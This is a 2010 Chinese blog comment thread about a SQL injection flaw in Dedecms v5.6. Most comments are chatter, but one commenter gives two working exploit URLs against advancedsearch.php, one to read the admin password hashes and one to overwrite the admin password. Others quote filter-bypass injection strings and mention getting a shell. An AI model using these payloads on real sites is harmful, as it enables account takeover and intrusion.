Dedecms v5.6的鸡肋注入的可行性分析

web5he11

Thu, 10 Jun 2010 18:46:33 +0800

oldjun果然是大牛啊。

不过第一楼的那个php的循环，估计会超时，或者运行死掉。不知道有没有更好的方法啊。（不用脚本，用其他的语言，多线程？？）

后面的那个绕过的方法太绝了。佩服佩服。

秒杀

Sat, 12 Jun 2010 18:03:18 +0800

直接就是是可以遍目录吧...目录下面没有index

Dedecms v5.6的鸡肋注入的可行性分析 | 神刀网

Mon, 14 Jun 2010 14:00:39 +0800

[...][...]

oldjun

Tue, 15 Jun 2010 23:44:38 +0800

http://www.t00ls.net/thread-8448-1-1.html

dede的SQL语句执行漏洞了！

前提先开启一个自定义搜索模型（一般情况下，不开的~）：

获取密码：
http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=SELECT%20pwd%20as%20aid%20FROM%20`%23@__admin`

重置密码：
http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=/**/update%20`%23@__admin`%20set%20pwd=0x6632393761353761356137343338393461306534/*

jannock

Sun, 27 Jun 2010 02:12:46 +0800

这个最后的SQL注入也差点被你发现了。继续读读代码，是存在注入的。而且结合其他因素还可以直接拿Shell

ppg

Mon, 28 Jun 2010 05:43:06 +0800

dedecms的注入，还没有试过呢

常笑鹰

Thu, 01 Jul 2010 08:00:45 +0800

我哭啊``《黑客脚本全本》昨天代理商刚退回给《黑客手册》卖书的````
  原来需要40块一本``  在代理商那只要 32块。。。
    好不容易凑到钱，一问老板，书刚退，欲哭无泪````
   还有，终于放假了，去申请Tools的会员了``

黑客帝国

Sat, 10 Jul 2010 03:21:49 +0800

书是买了，但是蛋定不下来。

匿名

Wed, 11 Aug 2010 17:58:01 +0800

MysqlIds 过滤了 '/*'

/**/UPDATE `dede_plus` set filelist = /*'*/ (select '1') WHERE `aid` =27

你的这个语句前后都有'/*' 我不懂你的意思

匿名

Wed, 11 Aug 2010 18:00:34 +0800

UPDATE `dede_plus` set filelist = '\\' and filelist ='aaa' and (select '1') WHERE `aid` =27

这个语句 MysqlIds 过滤了 select

我不知道这个是怎么运行的